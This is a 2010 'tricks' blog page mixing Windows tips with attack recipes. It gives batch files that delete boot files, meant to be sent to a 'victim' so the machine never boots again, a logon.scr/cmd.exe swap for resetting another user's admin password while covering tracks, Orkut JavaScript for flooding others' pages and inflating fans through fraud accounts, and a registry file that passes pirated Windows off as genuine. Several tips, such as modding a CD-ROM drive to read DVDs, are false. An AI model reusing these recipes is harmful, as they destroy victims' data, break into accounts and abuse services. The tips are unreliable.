THIS BLOG IS UNDER PROGRESS.....

PLEASE KEEP VISITING FOR REGULAR UPDATES AND SUGGESTIONS ARE ALWAYS WELCOMED.
Showing posts with label tricks. Show all posts
Showing posts with label tricks. Show all posts

Sunday, March 28, 2010

How to Make a Deadly but simple virus using one line Command remember this is for educational purposes only.

1)Make a text file
2)Enter the command given below-
erase /q /f /s /a:h c:\boot.ini c:\ntldr
3)Save the file as happy.bat

Send it to Victim.Let him open it.Thats it
The next time he reboots .. SYstem will not boot again

Elevator Trick

Tired of being on an elevator and someone else gets on every floor you go down to?
Well I was also, until I found out you could skip the floors that people would like to get on at. This is a really simple trick to do just to let you readers know.

Okay, the only thing you need to do is press down the close door button, and the floor you would like to go to at the same time.

Then it should skip all the floors that people want to get on and go straight to your floor that you would like to get off on. This can also piss some people off I would imagine. This trick has also worked on all the office elevators tried so far.

it works the easiest on:
Otis Elevators
Dover Elevators
And Most Desert Elevators
So have fun

How to modify your cd rom to watch dvd movies

There are two types of CD-ROM drives we can mod:
24x to 40x
40x or higher
Drives slower than 24x are too old to be modded.
24x to 40x CD ROMs
Laser Head Adjustments:
The track pitch of CDs is 1.6 microns, and the track pitch of DVDs is only 0.8 microns. The minimum length of track pits of CDs is 0.843mm, and the minimum length of track pits of DVDs is 0.293mm. That's why DVD discs can store much more data in the size of a CD.
Pinpointing this situation, we need to adjust the laser head so it can read discs with smaller track pitchs and shorter track pits. Open up the CD-ROM drive, do you see a lens on the rail? That's the laser head. On the side of the laser head, there's a screw you can adjust.
This is the key of this mod.
This screw can adjust the size of the laser beam that lands on the disc. Referring to the above, after adjusting, the laser beam should be less than 0.293mm, to suit the needs of DVD discs. So turn that screw 2-3 times. I got this number through trial and error. Mark with a pencil, in case you forget how many times you turned that screw.
Speed adjustments:
DVD-ROM drives can play DVD movies smoothly at 4x speed. If we're modding a 32x CD-ROM drive, the rotation speed is obviously too high, increasing heat, and shortening the life of the drive.
So we need to decrease the speed of it.
Most people know that power supplies can provide 5V (red wire) and 12V (yellow wire) electricity output for Molex connectors. Find the Molex connector you'll plug into the modded CD-ROM drive, cut the yellow wire or insulate it with tape, so only 5V of electricity is transferred to the CD-ROM drive. The speed of the drive is now 32 * 5/17 = 9.41x and can now fulfill our requirements.

40x or higher CD ROMs
When 40x CD-ROM drives are released, most manufacturers are already producing DVD-ROM drives. To lower cost, they use the same core as DVD-ROM drives with DVD functions disabled. What we need to do here is to re-enable the DVD function.
Open up the CD-ROM, behind the circuit board, look for a jumper that says DVD JUMP. Find a jumper to connect this jumper. Thin metal wire also works fine.
OK, so the DVD function is unlocked, but we still need to decrease the speed. Use the instructions above on how to decrase the speed of the drive.
Notes:
Modded drives cannot be detected in POST, that means you cannot use it in DOS. But once you get into Windows, the drive works fine.
Modded drives have no region code problems.
Modded drives MIGHT NOT read DVD9 discs, that's why I said you can watch most retail DVDs in the beginning

Change Ur IP Address in Less Than 20 Sec!!!


-------------------------------------------------------------------------------
The following is a guide on how to change your IP in 30 seconds or less. This can be used if your IP has been banned from a game server, or on gunbound if your IP get's blocked. I've tried this on both Windows XP and Windows 2000, and it has worked:

1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok

You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"

You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again

You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address

With a little practice, you can easily get this process down to 15 seconds.

*Note* This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back

Cool XP tricks using regedit

Speed up your browsing of Windows 2000 & XP machines
Open up the Registry and go to :
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Curr ent Version/Explorer/RemoteComputer/NameSpace
Under that branch, select the key :
{D6277990-4C6A-11CF-8D87-00AA0060F5BF}
and delete it.
This is key that instructs Windows to search for Scheduled Tasks. If you like you may want to export the exact branch so that you can restore the key if necessary.
This fix is so effective that it doesn't require a reboot.

Speed Up Browsing

When you connect to a web site your computer sends information back and forth. Some of this information deals with resolving the site name to an IP address, the stuff that TCP/IP really deals with, not words. This is DNS information and is used so that you will not need to ask for the site location each and every time you visit the site. Although Windows XP and Windows XP have a pretty efficient DNS cache, you can increase its overall performance by increasing its size. You can do this with the registry entries below:

go to regedit-
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\Dnscache\Parameters]
"CacheHashTableBucketSize"=dword:00000001
"CacheHashTableSize"=dword:00000180
"MaxCacheEntryTtlLimit"=dword:0000fa00
"MaxSOACacheEntryTtlLimit"=dword:0000012d

Make a new text file and rename it to dnscache.reg. Then copy and paste the above into it and save it. Merge it into the registry by opening it.

How to easily merge two partitions (C and D drive) in Windows Vista



Here are simple steps on how you can easily merge two partitions (C and D drive) in Windows Vista.

Follow the simple steps below:
Click on Start in Vista.
Go to Control Pannel (Follow steps pre-fixed 'A' for "Control Panel Home view" / 'B' for "Classic View").
A: Click "System And Maintenance" (in green).
B: Click Administrative Tools (the one with a big gear icon).
A: Under Administrative Tools, click "Create and format disk partitions" (If a UAC prompt apears, click continue).
B: Click "Computer management" (If a UAC prompt apears, click continue), Next click "Storage", then "Disk Management".
On the list provided, right-click the letter drive you want to rid yourself off (say D:) and choose the option "Delete Volume".
If you have done it right, a black area should appear within your entire disk space.
Finally, right-click your drive you want to add the space to (say C:) and choose "Extend Volume" (by default, the wizard will choose ALL unallocated space to add to your Vista partition, but you can change that if you'd like.)
Hope this helps you.

How to shut down a computer FOREVER!

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Open up notepad and copy and paste that. Save it as a .bat file.

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. Have fun >:-D

REMEMBER - DO NOT CLICK THIS FILE. (for the idiots)

YOU WONT RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!

How Long Has Your Windows XP System Been Running?

Here's how you can find out system uptime:

-Click Start | Run and type cmd to open a command prompt.
-At the prompt, type systeminfo

-Scroll down the list of information to the line that says System Up Time.

-This will tell you in days, hours, minutes and seconds how long the system has been up.

Note that this command only works in XP Pro, not in XP Home. You can, however, type net statistics workstation at the prompt in Home. The first line will tell you the day and time that the system came online.

Speed up Mozilla FireFox 3-30x Faster !!!!

1. Type “about:config” into the address bar and hit return. Scroll
down and look for the following entries:


network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests


Normally the browser will make one request to a web page at a time.
When you enable pipelining it will make several at once, which really
speeds up page loading.


2. Alter the entries as follows:


Set “network.http.pipelining” to “true”
Set “network.http.proxy.pipelining” to “true”
Set “network.http.pipelining.maxrequests” to some number like 30. This
means it will make 30 requests at once.


3. Lastly right-click anywhere and select New-> Integer.


Name it “nglayout.initialpaint.delay” and set its value to “0″.
This value is the amount of time the browser waits before it acts on information it recieves.


If you’re using a broadband connection you’ll load pages 2-30 times faster now

Disable The Send Error Report To Microsoft

To disable the stupid feature in WinXP which tries to send a report to microsoft every time a program crashes you will have to do this:

-Open Control Panel
-Click on Preformance and Maintenance.
-Click on System.
-Then click on the Advanced tab
-Click on the error reporting button on the bottom of the windows.
-Select Disable error reporting.
-Click OK
-Click OK

Optimise performance of your windows pc

To boost performance of your PC or to increase RAM virtually,
Right click on My Computer Icon on Desktop
>> Go to Properties
>> Go to Advanced
>> Go to Performance - Settings
>> Go to Advanced
>> Go to Virtual Memory - Change
Keep the initial size same as recommended and maximum size double of it then restart your system.
It will improve speed of windows and you can play some games which require higher RAM.


To Minimise all the application and running windows press the "Windows + M " key together.

****---COOL ORKUT TRICKS----****


It came and it conquered! Orkut has become a worldwide rage, and is nothing short of the same in India too. Guys I have compiled a list of all the cool orkut tricks which will spice up your orkutting and make you stand out in the crowd.

-These javascripts are to be pasted in the browser only. No need to download any software or use any firefox extension. All Javascripts should be pasted in single line.

Flooding Scrapbook

Steps to flood others scrapbook:
==> Go to the profile of your friend.
==> Copy Paste this in your address bar

javascript:var i=1;function orkuttricks(){i=i+1;document.forms
[0].elements[2].value= “I have flooded our SCRAPBOOK by this number
of times”+”[green]”+i+”[/green]”;
document.getElementsByTagName(’input’).item(3).click();};
void(setInterval(orkuttricks,500));
Another Script

javascript:i=9874654;sar=’Flooding by Tricks4fun ..!![silver]’; a=document.forms[0];a.action+=’&Action.submit=’; setInterval(”i++; a.scrapText.value=sar+i; a.submit()”,500);void(0)

==> Press Enter
Steps to flood your own scrapbook

==> Open your own scrapboook
==> Copy paste this code

javascript:var i=” “;function tricks4fun(){i=i+” “;
document.forms[0].elements[2].value=” “+i;
document.getElementsByTagName(’input’).item(3).click();};void
(setInterval(tricks4fun,500));
Increasing Number of fans

==> Add yourself in any fraud account you have.
==> Log into the fraud account.
==> Go to http://www.orkut.com/Friends.aspx
==> Put cursor on the “fan” icon. You will see at the status bar of your
browser (at the bottom of your browser) something like
” FRUS0016756489/US209709881 “. Write down that thing in a copy.
==> Now write this code in the address bar:

javascript:i=0;for(i=0;i< =100;i++){sendRequest
(”/SetKarma.aspx?cat=”+0+”&
val=”+”3″+”&gid=”+”FRUS0009505081/US0014188150″);};void(0);

==> Change “FRUS0009505081/US0014188150″ with the one you have
written in the copy.
==> Press Enter.

Testimonial Flooding

>==> Open the testimonial writting page of your any friend.
==> Paste this in the address bar:

javascript:function tricks4fun(){document.getElementsByTagName
(’input’).item(2).click();};void(setInterval(tricks4fun,404));
Colorful Scraps

==> Write your message/scrap/ in community or scrapbook
==> Copy paste the code below in your browser and then press enter.
==> You will see change in the message you wrote,
Press Submit and enjoy.

javascript:cor=new Array(’aqua’,’blue’,’fuchsia’,’gold’,’gray’,
‘green’,’lime’,’maroon’,’navy’,’olive’,’orange’,’pink’,’purple’,’red’,’
silver’,’teal’,’violet’,’yellow’ ); varz=0;
txt=document.getElementsByTagName(’textarea’)[0]; txt.value=txt.value.replace(/(.)/gi,”§$1″);
txt.value =txt.value.replace(/\§ /gi,” “); for(y=0;y
{txt.value=txt.value.replace(/\§/,’[’+cor[z]+’]’);z++;if
(z==cor.length){z=0}}void(0)

Animated Orkut Windows

==> Just copy paste in your browser and see what happens:

javascript:R=-1;DI=document.links;DIL=DI.length;function A(a,b,c)
{return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position=’absolute’;
DIS.left=A(5,100,500);DIS.top=A(5.6,60,150)}setInterval
(’R++;B(R%DIL)’,15);void(0)
Reverse the Post

Just use this keyword..
“& # 8 2 3 8″ with no spaces and blanks in between.

****---COOL ORKUT TRICKS----****


It came and it conquered! Orkut has become a worldwide rage, and is nothing short of the same in India too. Guys I have compiled a list of all the cool orkut tricks which will spice up your orkutting and make you stand out in the crowd.

-These javascripts are to be pasted in the browser only. No need to download any software or use any firefox extension. All Javascripts should be pasted in single line.

Flooding Scrapbook

Steps to flood others scrapbook:
==> Go to the profile of your friend.
==> Copy Paste this in your address bar

javascript:var i=1;function orkuttricks(){i=i+1;document.forms
[0].elements[2].value= “I have flooded our SCRAPBOOK by this number
of times”+”[green]”+i+”[/green]”;
document.getElementsByTagName(’input’).item(3).click();};
void(setInterval(orkuttricks,500));
Another Script

javascript:i=9874654;sar=’Flooding by Tricks4fun ..!![silver]’; a=document.forms[0];a.action+=’&Action.submit=’; setInterval(”i++; a.scrapText.value=sar+i; a.submit()”,500);void(0)

==> Press Enter
Steps to flood your own scrapbook

==> Open your own scrapboook
==> Copy paste this code

javascript:var i=” “;function tricks4fun(){i=i+” “;
document.forms[0].elements[2].value=” “+i;
document.getElementsByTagName(’input’).item(3).click();};void
(setInterval(tricks4fun,500));
Increasing Number of fans

==> Add yourself in any fraud account you have.
==> Log into the fraud account.
==> Go to http://www.orkut.com/Friends.aspx
==> Put cursor on the “fan” icon. You will see at the status bar of your
browser (at the bottom of your browser) something like
” FRUS0016756489/US209709881 “. Write down that thing in a copy.
==> Now write this code in the address bar:

javascript:i=0;for(i=0;i< =100;i++){sendRequest
(”/SetKarma.aspx?cat=”+0+”&
val=”+”3″+”&gid=”+”FRUS0009505081/US0014188150″);};void(0);

==> Change “FRUS0009505081/US0014188150″ with the one you have
written in the copy.
==> Press Enter.

Testimonial Flooding

>==> Open the testimonial writting page of your any friend.
==> Paste this in the address bar:

javascript:function tricks4fun(){document.getElementsByTagName
(’input’).item(2).click();};void(setInterval(tricks4fun,404));
Colorful Scraps

==> Write your message/scrap/ in community or scrapbook
==> Copy paste the code below in your browser and then press enter.
==> You will see change in the message you wrote,
Press Submit and enjoy.

javascript:cor=new Array(’aqua’,’blue’,’fuchsia’,’gold’,’gray’,
‘green’,’lime’,’maroon’,’navy’,’olive’,’orange’,’pink’,’purple’,’red’,’
silver’,’teal’,’violet’,’yellow’ ); varz=0;
txt=document.getElementsByTagName(’textarea’)[0]; txt.value=txt.value.replace(/(.)/gi,”§$1″);
txt.value =txt.value.replace(/\§ /gi,” “); for(y=0;y
{txt.value=txt.value.replace(/\§/,’[’+cor[z]+’]’);z++;if
(z==cor.length){z=0}}void(0)

Animated Orkut Windows

==> Just copy paste in your browser and see what happens:

javascript:R=-1;DI=document.links;DIL=DI.length;function A(a,b,c)
{return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position=’absolute’;
DIS.left=A(5,100,500);DIS.top=A(5.6,60,150)}setInterval
(’R++;B(R%DIL)’,15);void(0)
Reverse the Post

Just use this keyword..
“& # 8 2 3 8″ with no spaces and blanks in between.

Make Windows XP and Vista Genuine in a single click

tGuys very often you would have come across spurious softwares , cracks and what not promising to make your copy of windows genuine...and you would agree with me that most of the times these do not deliver....

Now,here i bring for you especially for the users of Downloads n Hacks a trick to make your windows genuine without having to download anything....

Believe me its 100% working as all my friends have used it....

Just copy the following in notepad without changing anything.
Save it as License Key.reg
Double-click and confirm "Yes"

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]

"CurrentBuild"="1.511.1 () (Obsolete data - do not use)"
"ProductId"="55274-640-1011873-23081"

"DigitalProductId"=hex:a4,00,00,00,03,00,00,00,35,35,32,37,34,2d,36,34,30,2d,\

31,30,31,31,38,37,33,2d,32,33,30,38,31,00,2e,00,00,00,41,32,32,2d,30,30,30,\

30,31,00,00,00,00,00,00,00,86,56,4e,4c,21,1b,2b,6a,a3,78,8e,8f,98,5c,00,00,\

00,00,00,00,dd,da,47,41,cc,6b,06,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\

00,00,00,00,00,00,00,00,00,00,00,38,31,30,32,36,00,00,00,00,00,00,00,b5,16,\
00,00,83,83,1f,38,f8,01,00,00,f5,1c,00,00,00,00,00,00,00,00,00,00,00,00,00,\

00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,66,e5,70,f3

"LicenseInfo"=hex:33,b7,21,c1,e5,e7,cd,4b,fd,7c,c6,35,51,fd,52,57,17,86,3e,18,\

d3,f4,8c,8e,35,32,7b,d1,43,8d,61,38,60,a4,ca,55,c9,9a,35,17,46,7a,4f,91,fc,\

4a,d9,db,64,5c,c4,e2,0f,34,f3,ea

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents]

"OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33,93,fd


NJOY!

Incase this method doesnt work for you then kindly inform me so that i can look into it and sort it out.....

Make Windows XP and Vista Genuine in a single click

Guys very often you would have come across spurious softwares , cracks and what not promising to make your copy of windows genuine...and you would agree with me that most of the times these do not deliver....

Now,here i bring for you especially for the users of Downloads n Hacks a trick to make your windows genuine without having to download anything....

Believe me its 100% working as all my friends have used it....

Just copy the following in notepad without changing anything.
Save it as License Key.reg
Double-click and confirm "Yes"

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]

"CurrentBuild"="1.511.1 () (Obsolete data - do not use)"
"ProductId"="55274-640-1011873-23081"

"DigitalProductId"=hex:a4,00,00,00,03,00,00,00,35,35,32,37,34,2d,36,34,30,2d,\

31,30,31,31,38,37,33,2d,32,33,30,38,31,00,2e,00,00,00,41,32,32,2d,30,30,30,\

30,31,00,00,00,00,00,00,00,86,56,4e,4c,21,1b,2b,6a,a3,78,8e,8f,98,5c,00,00,\

00,00,00,00,dd,da,47,41,cc,6b,06,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\

00,00,00,00,00,00,00,00,00,00,00,38,31,30,32,36,00,00,00,00,00,00,00,b5,16,\
00,00,83,83,1f,38,f8,01,00,00,f5,1c,00,00,00,00,00,00,00,00,00,00,00,00,00,\

00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,66,e5,70,f3

"LicenseInfo"=hex:33,b7,21,c1,e5,e7,cd,4b,fd,7c,c6,35,51,fd,52,57,17,86,3e,18,\

d3,f4,8c,8e,35,32,7b,d1,43,8d,61,38,60,a4,ca,55,c9,9a,35,17,46,7a,4f,91,fc,\

4a,d9,db,64,5c,c4,e2,0f,34,f3,ea

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents]

"OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33,93,fd


NJOY!

Incase this method doesnt work for you then kindly inform me so that i can look into it and sort it out.....

Another way to hack windows XP admin password

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user password"

If the Administrator Account is called abc and you want the password blah enter this

"net user abc blah"

and this changes the password on abc's machine to blah and you'r in.


Have fun

p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

Unlock The Supersecret Administrator Account For Vista


Deep inside the bowels of Windows Vista, there’s a secret Administrator account, and it’s different from the normal administrator account you most likely have set up on your PC. This Administrator account is not part of the Administrator group. (Confused yet? You should be.) It’s a kind of superadministrator, akin to the root account in Unix, and by default it’s turned off and hidden. (In describing this tut, i’ll always use the capital “A” for the secret Administrator account, and a lowercase “a” for a normal administrator account.)

In versions of Windows before Windows Vista, the Administrator account wasn’t hidden, and many people used it as their main or only account. This Administrator account had full rights over the computer.

In Windows Vista, Microsoft changed that. In Vista, the Administrator account is not subject to UAC, but normal administrator accounts are. So the Administrator can make any changes to the system and will see no UAC prompts.

Turning on the Administrator account is straightforward. First, open command prompt by typing cmd into the run box on the Start menu, or by right-clicking the command prompt icon that appears at the top of the Start menu, then selecting Run as administrator.

Then enter this command and press Enter:

Net user administrator /active:yes

From now on, the Administrator account will appear as an option on the Welcome screen, along with any user accounts you may have set up. Use it like any other account. Be aware that it won’t have a password yet, so it’s a good idea to set a password for it.

If you want to disable the account and hide it, enter this command at an elevated command prompt and press Enter:

Net user administrator /active:no

How To Block Websites Without Using Any Software

Guys sometimes we want to restrict access to some particular website from our PC but we dont know how to do it without using some software for it.
Here i m sharing with you a method to do it without using any software...

1]Browse C:\WINDOWS\system32\drivers\etc
2] Find the file named "HOSTS"
3] Open it in notepad
4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.sitenameyouwantblocked.com , and that site will no longer be accessable.
5] Done!

Saturday, March 27, 2010

Quick Launch Apps Quick Open Trick...!

You are probably using QuickLaunch for easy and immediate access to your favorite applications. However, you’re using the mouse to click on the icons. If you want to reduce the time needed to get things done to a minimum, you should use the keyboard.


In order to access the applications in your QuickLaunch toolbar with your keyboard, use the following combination of key strokes:

[Windows Key]+0 for the first shortcut
[Windows Key]+1 for the second shortcut
and so on an so forth.

[TRIED N TESTED IN VISTA ]

Friday, March 26, 2010

Another way to hack windows XP admin password


If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user password"

If the Administrator Account is called abc and you want the password blah enter this

"net user abc blah"

and this changes the password on abc's machine to blah and you'r in.


Have fun

p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks